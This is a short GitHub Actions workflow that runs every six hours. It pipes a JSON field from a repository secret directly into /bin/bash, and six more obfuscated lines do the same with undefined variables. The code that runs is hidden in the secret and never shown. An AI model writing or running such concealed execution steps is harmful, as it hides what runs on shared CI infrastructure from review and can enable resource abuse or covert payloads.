name: wenziytx

on:
  workflow_dispatch:
  schedule:
    - cron: '37 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wenziytx
        env:
          txzd3: ${{ secrets.txzd3 }}
        run: |
          echo $txzd3 | jq -r .pkicy89858 | /bin/bash
          echo $bhfb3814 | jq -r .mv7188 | /bin/bash
          echo $sdo1747 | jq -r .z76890 | /bin/bash
          echo $eocm31 | jq -r .jii78 | /bin/bash
          echo $zfdz39629 | jq -r .o4061 | /bin/bash
          echo $vh61294 | jq -r .ao83 | /bin/bash
          echo $jqq8440 | jq -r .dvv5 | /bin/bash

